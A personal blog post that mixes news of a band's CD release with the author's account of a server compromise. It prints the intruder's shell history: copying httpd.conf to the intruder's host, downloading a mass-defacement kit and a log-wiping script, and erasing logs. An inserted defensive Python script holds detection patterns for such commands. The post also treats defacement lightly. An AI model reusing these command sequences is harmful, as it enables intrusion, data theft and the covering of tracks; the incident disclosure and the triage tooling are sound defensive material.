Open your eyes, Everybody.. it’s always the right time..

Well, a day of good and bad spots.

First of all, let me just say, the U.S.E. CD release party _rocked_! I realize very few of my friends list lives in Seattle, and of those who do, most wouldn’t ever do anything as plebeian as listening to U.S.E., but I don’t care. It rocked. If you like the B-52s, or 80s pop in general, their CD is well worth the $12. Those of you not in the SeaTac area can buy it at their web site.

No, they’re not paying me to plug them. 😉 They’re just really good. And their music has hope – something that I’ve been missing. 😉

Anyway, second of all, Curious warned me and I was a bad Sheer and didn’t listen.. the kernel on sheer.us had two known paths to root from nonpriv’d users.. and I got owned, by aarkan@rachacuca.homelinux.com.

An excerpt of the .bash_history, for those of you who like such things, is below:

who
ps aux
cd /usr/local/apache/conf
ls
who
ftp ftp.grupong.v10.com.br
ftp ftp.grupong.v10.com.br
ftp rachacuca.homelinux.com
ftp rachacuca.homelinux.com
scp httpd.conf aarkan@rachacuca.homelinux.com
scp httpd.conf aarkan@rachacuca.homelinux.com:/home/aarkan
cd
cd /root
cd .ssh
ls
rm know_hosts
cat /dev/null > known_hosts
cd /tmp
cd /home
ls
cd kenny
ls
cd ..
ls
cd netlogin
ls
cd ..
lls
ls
cd
cd /
mkdir mass
cd mass
wget www.geocities.com/xferror/mass.tgz
wget rachacuca.homelinux.com/NG/index.html
uname -a
wget rachacuca.homelinux.com/NG/index.html
rm index.html
mv index.html.1 index.kmg
tar zxvf mass.tgz
./mass /home
chmod 777 mass
chmod 777 mass2
chmod 777 mass3
cd /usr/local/apache/logs
ls
cat /dev/null > *
ls -l
cd /mass
wget rachacuca.homelinux.com/NG/limpalog.sh
chmod 777 limpalog.sh
./limpalog.sh /usr/local/apache/logs
ls -l /usr/local/apache/logs
./limpalogs.sh /var/logs
./limpalog.sh /var/log
./limpalog.sh /var/log/httpd
./mass /home
./mass1 /home
./mass2 /home
./mass3 /home
rm brk2.zip
rm bind.zip
rm -rf /mass

Anyway, normally I’d be completely cool with this – but he didn’t leave the old index.html’s renamed, so I’m somewhat annoyed at him.

Look, security can be a game of chess, fun for both sides – or it can be a war, involving cops and thugs and jail time and stuff. If no damage is done, it’s a lot more likely to stay the former – fun for everyone.

Hackers, ALWAYS back up what you deface. Luckily, the wayback machine had most of what was lost (I hadn’t done a backup in forever. Bad sheer number 2.. )

Anyway, so right now I’m slowly progressing through the PITA of upgrading every potentially vulnerable service..
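
A defender-side triage of a shell history like the excerpt above, as an added example that is not part of the original post. The rule names, regexes and the `download_and_run` correlation are assumptions chosen for illustration, and the sample lines are constructed from the excerpt with hostnames replaced by `example.invalid`:

```python
import re
from collections import defaultdict

# Heuristic rules (assumptions): tag -> regex whose group(1) is the target.
RULES = {
    "truncate": re.compile(r"^(?:cat\s+/dev/null|:)\s*>\s*(\S+)"),
    "transfer_out": re.compile(r"^(?:scp|ftp)\s+.*?(\S+)$"),
    "download": re.compile(r"^(?:wget|curl)\s+.*?([^/\s]+)$"),
    "chmod": re.compile(r"^chmod\s+(?:[0-7]*[1357][0-7]*|[ugoa]*\+x)\s+(\S+)"),
    "exec_local": re.compile(r"^\./(\S+)"),
}

# Constructed sample, modelled on the excerpt above.
SAMPLE = """\
scp httpd.conf user@example.invalid:/home/user
cat /dev/null > known_hosts
wget example.invalid/NG/limpalog.sh
chmod 777 limpalog.sh
./limpalog.sh /usr/local/apache/logs
ls -l /usr/local/apache/logs
"""

def triage(history):
    """Return (line_no, tag, target) for every line matching a rule."""
    events = []
    for n, line in enumerate(history.splitlines(), 1):
        for tag, rx in RULES.items():
            m = rx.match(line.strip())
            if m:
                events.append((n, tag, m.group(1)))
                break
    return events

def download_and_run(events):
    """Names fetched, then made executable, then run: (name, exec line_no)."""
    seen = defaultdict(set)
    chains = []
    for n, tag, target in events:
        name = target.rsplit("/", 1)[-1]
        if tag == "exec_local" and {"download", "chmod"} <= seen[name]:
            chains.append((name, n))
        seen[name].add(tag)
    return chains

if __name__ == "__main__":
    ev = triage(SAMPLE)
    for n, tag, target in ev:
        print(f"{n:3} {tag:13} {target}")
    print("download-and-run chains:", download_and_run(ev))
```

A history file is attacker-writable, so treat hits as leads to confirm against process accounting, remote syslog or file timestamps rather than as a complete record.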

One Response to “Open your eyes, Everybody.. it’s always the right time..”

  1. jcurious Says:

    yea.. I’m doin’ bad in the backup department too.. btw were you able to recover limpalog.sh, brk2.zip and bind.zip?
    how is upgrading a pain in the ass?
    just do:
    apt-get update ; apt-get upgrade

    errr.. unless you’re not running debian..

    seriously.. I’m sorry to hear you got hacked.. from the looks of it… it could have been much worse..
    judging from the file sizes in your log directories.. it seems as though syslog was never killed 😉

    doesn’t seem like it’s someone who knew what they were doing..
    shrugs
